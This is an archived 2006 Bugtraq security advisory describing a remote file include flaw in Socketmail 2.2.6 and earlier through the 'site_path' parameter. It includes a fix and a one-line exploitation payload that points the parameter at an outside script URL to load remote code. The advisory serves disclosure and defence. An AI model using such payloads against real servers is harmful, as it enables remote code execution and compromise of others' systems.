| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 25 May 2006 09:04:05 -0000 From: admin@...orsecurity.de To: bugtraq@...urityfocus.com Subject: [MajorSecurity #6]Socketmail <= 2.2.6 - Remote File Include Vulnerability [MajorSecurity]Socketmail <= 2.2.6 - Remote File Include Vulnerability -------------------------------------------------------- Software: Socketmail Version: <=2.2.6 Type: Remote File Include Vulnerability Date: May, 25th 2006 Vendor: Creative Digital Resources Page: http://socketmail.com Risc: High Credits: ---------------------------- 'Aesthetico' http://www.majorsecurity.de Affected Products: ---------------------------- Socketmail Lite 2.2.6 and prior Socketmail Pro 2.2.6 and prior Description: ---------------------------- SocketMail is a powerful, scalable and fully customisable e-mail solution. Ideal messaging solution for sizes web site and enterprises. Requirements: ---------------------------- register_globals = On magic_quotes = On Vulnerability: ---------------------------- Input passed to the "site_path" parameter in "index.php" and "inc-common.php" is not properly verified, before it is used to include files. This can be exploited to execute arbitrary code by including files from external resources. Solution: ---------------------------- Edit the source code to ensure that input is properly sanitised. Set "register_globals" to "Off". Exploitation: ---------------------------- Post data: site_path=http://www.yourspace.com/yourscript.php?
Powered by blists - more mailing lists